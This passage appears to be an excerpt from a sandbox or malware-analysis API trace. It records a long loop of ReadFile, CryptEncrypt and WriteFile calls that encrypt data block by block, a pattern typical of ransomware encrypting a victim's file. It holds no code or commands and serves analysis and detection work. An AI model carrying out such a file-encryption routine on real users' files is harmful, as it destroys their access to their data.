(in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.732] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.732] GetLastError () returned 0x0 [0160.732] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.732] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.732] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.732] GetLastError () returned 0x0 [0160.732] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.732] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.732] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.732] GetLastError () returned 0x0 [0160.732] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.732] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.732] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.732] GetLastError () returned 0x0 [0160.732] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.732] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.732] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.732] GetLastError () returned 0x0 [0160.732] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.732] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.733] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.733] GetLastError () returned 0x0 [0160.733] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.733] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.733] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.733] GetLastError () returned 0x0 [0160.733] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.733] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.733] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.733] GetLastError () returned 0x0 [0160.733] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.733] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.733] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.733] GetLastError () returned 0x0 [0160.733] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.733] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.733] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.733] GetLastError () returned 0x0 [0160.733] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.733] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.733] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.733] GetLastError () returned 0x0 [0160.733] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.733] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.733] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.733] GetLastError () returned 0x0 [0160.733] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.734] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.734] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.734] GetLastError () returned 0x0 [0160.734] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.734] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.734] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.734] GetLastError () returned 0x0 [0160.734] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.734] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.734] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.734] GetLastError () returned 0x0 [0160.734] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.734] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.734] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.734] GetLastError () returned 0x0 [0160.734] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.734] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.734] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.734] GetLastError () returned 0x0 [0160.734] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.734] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.734] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.734] GetLastError () returned 0x0 [0160.734] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.735] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.735] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.735] GetLastError () returned 0x0 [0160.735] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.735] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.735] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.735] GetLastError () returned 0x0 [0160.735] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.735] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.735] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.735] GetLastError () returned 0x0 [0160.735] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.735] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.735] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.735] GetLastError () returned 0x0 [0160.735] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.735] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.735] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.735] GetLastError () returned 0x0 [0160.735] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.735] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.735] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.735] GetLastError () returned 0x0 [0160.735] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.735] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.736] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.736] GetLastError () returned 0x0 [0160.736] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.736] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.736] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.736] GetLastError () returned 0x0 [0160.736] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.736] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.736] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.736] GetLastError () returned 0x0 [0160.736] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.736] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.736] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.736] GetLastError () returned 0x0 [0160.736] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.736] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.736] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.736] GetLastError () returned 0x0 [0160.736] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.736] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.736] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.736] GetLastError () returned 0x0 [0160.736] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.736] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.737] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.737] GetLastError () returned 0x0 [0160.737] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.737] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.737] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0160.737] GetLastError () returned 0x0 [0160.737] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0160.737] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, 